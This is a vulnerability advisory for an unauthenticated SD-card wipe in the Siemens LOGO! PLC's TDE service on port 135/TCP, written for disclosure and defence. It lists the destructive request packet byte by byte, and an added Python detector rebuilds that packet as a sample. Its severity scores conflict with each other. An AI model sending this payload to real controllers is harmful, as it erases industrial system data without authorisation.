Siemens LOGO! TDE service "NFSAccess" Delete Denial of Service Vulnerability

2020-06-09
Talos Intelligence
www.talosintelligence.com

CVSS2: 6.4

Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: NONE

AV:N/AC:L/Au:N/C:P/I:P/A:N

CVSS3: 9.1

Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

EPSS: 0.001
Percentile: 48.3%

Summary

An exploitable denial of service vulnerability exists in the TDE service functionality of Siemens LOGO! 1.82.02, 12/24RCE Version 0BA and 230RCE Version 0BA. A specially crafted network request can be used to delete critical system data, resulting in a denial of service. An attacker can send an unauthenticated packet to trigger this vulnerability.

Tested Versions

Siemens LOGO! 1.82.02
Siemens LOGO! 12/24RCE Version 0BA
Siemens LOGO! 230RCE Version 0BA

Product URLs

https://new.siemens.com/global/en/products/automation/systems/industrial/plc/logo.html

CVSSv3 Score

9.3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:H

CWE

CWE-306 - Missing Authentication for Critical Function

Details

Siemens LOGO! is an intelligent logic module (PLC) meant for automation projects such as industrial control systems, office/commercial and home settings. It is deployed worldwide and can be controlled remotely.

The SD card can be completely erased through the LOGO TDE service port 135/TCP using the "NFSAccess" delete function. The vulnerability could be exploited by an unauthenticated attacker with network access to port 135/TCP. No user interaction is required to exploit this vulnerability.

Structure of the payload message sent (each line is four bytes; comments describe the field):

\x4B\xd0\x04\xc0    # Start of message: Signature, Version, ClientVersion, Sync Flag, Return Flag, Request Flag
\x01\x00\x00\x00    # Context
\x01\x00\x00\x00    # Session
\x4e\x46\x53\x41    # "NFSAccess" command (ASCII, NUL-padded)
\x63\x63\x65\x73
\x73\x00\x00\x00    # Delete
\x00\x00\x00\x00
\x74\x00\x00\x00
\xff\xff\xff\xff
\xff\xff\xff\xff    # File handle
\xff\xff\xff\xff
\x00\x00\x00\x00
\x15\x00\x00\x00    # Data Size (0x15 = 21 bytes: the 12-byte path plus 9 NUL bytes)
\x00\x00\x00\x00
\x2f\x64\x65\x76    # "/dev/sdcard/" - SD card path
\x2f\x73\x64\x63
\x61\x72\x64\x2f
\x00\x00\x00\x00
\x00\x00\x00\x00
\x00

We were able to identify this vulnerability on firmware 1.82.02 (released on May 13, 2019). Due to hardware similarity, we believe that all the 0BA8 and 0BA7 families are vulnerable independently of hardware type or firmware.
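The following is an added example, not code from the advisory or from Siemens: a decoder for the message layout above that a network monitor on port 135/TCP could use to flag NFSAccess requests naming the SD card path. Field offsets are read off the advisory's byte listing; the constructed sample reproduces that listing, and the meaning of the 0x74 word is an assumption.

```python
import struct
from dataclasses import dataclass

TDE_SIGNATURE = 0x4B   # first byte of every message in the advisory's layout
DATA_OFFSET = 56       # offset of the data block (after the Data Size field + 4 NUL bytes)

# Constructed sample: the request bytes as listed in the advisory.
SAMPLE_REQUEST = (
    b"\x4b\xd0\x04\xc0"             # signature, version, client version, flags
    + b"\x01\x00\x00\x00"           # context
    + b"\x01\x00\x00\x00"           # session
    + b"NFSAccess\x00\x00\x00"      # command name, NUL-padded to 12 bytes
    + b"\x00\x00\x00\x00"
    + b"\x74\x00\x00\x00"           # operation word (assumed to select the delete function)
    + b"\xff" * 12                  # file handle
    + b"\x00\x00\x00\x00"
    + b"\x15\x00\x00\x00"           # data size = 21
    + b"\x00\x00\x00\x00"
    + b"/dev/sdcard/" + b"\x00" * 9 # SD card path, NUL-padded to 21 bytes
)

@dataclass
class TdeRequest:
    signature: int
    context: int
    session: int
    command: str
    op_word: int
    file_handle: bytes
    data: bytes

def parse_tde_request(pkt: bytes) -> TdeRequest:
    """Decode the header fields and data block of a LOGO! TDE request."""
    if len(pkt) < DATA_OFFSET:
        raise ValueError("truncated TDE message")
    context, session = struct.unpack_from("<II", pkt, 4)
    command = pkt[12:24].split(b"\x00", 1)[0].decode("ascii", errors="replace")
    op_word = struct.unpack_from("<I", pkt, 28)[0]
    data_size = struct.unpack_from("<I", pkt, 48)[0]
    data = pkt[DATA_OFFSET:DATA_OFFSET + data_size]
    if len(data) != data_size:               # size field must not claim more than is present
        raise ValueError("data size exceeds message length")
    return TdeRequest(pkt[0], context, session, command, op_word, pkt[32:44], data)

def is_sdcard_nfsaccess_request(pkt: bytes) -> bool:
    """True when a well-formed TDE NFSAccess request targets the SD card path."""
    try:
        req = parse_tde_request(pkt)
    except ValueError:
        return False
    path = req.data.split(b"\x00", 1)[0]
    return (req.signature == TDE_SIGNATURE and req.command == "NFSAccess"
            and path.startswith(b"/dev/sdcard"))
```

Because the TDE service performs no authentication, an alert from this check is the only indication a defender gets before the card is erased; restricting reachability of 135/TCP to trusted engineering hosts remains the primary mitigation.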

Timeline

2020-03-20 - Vendor Disclosure
2020-06-09 - Public Release
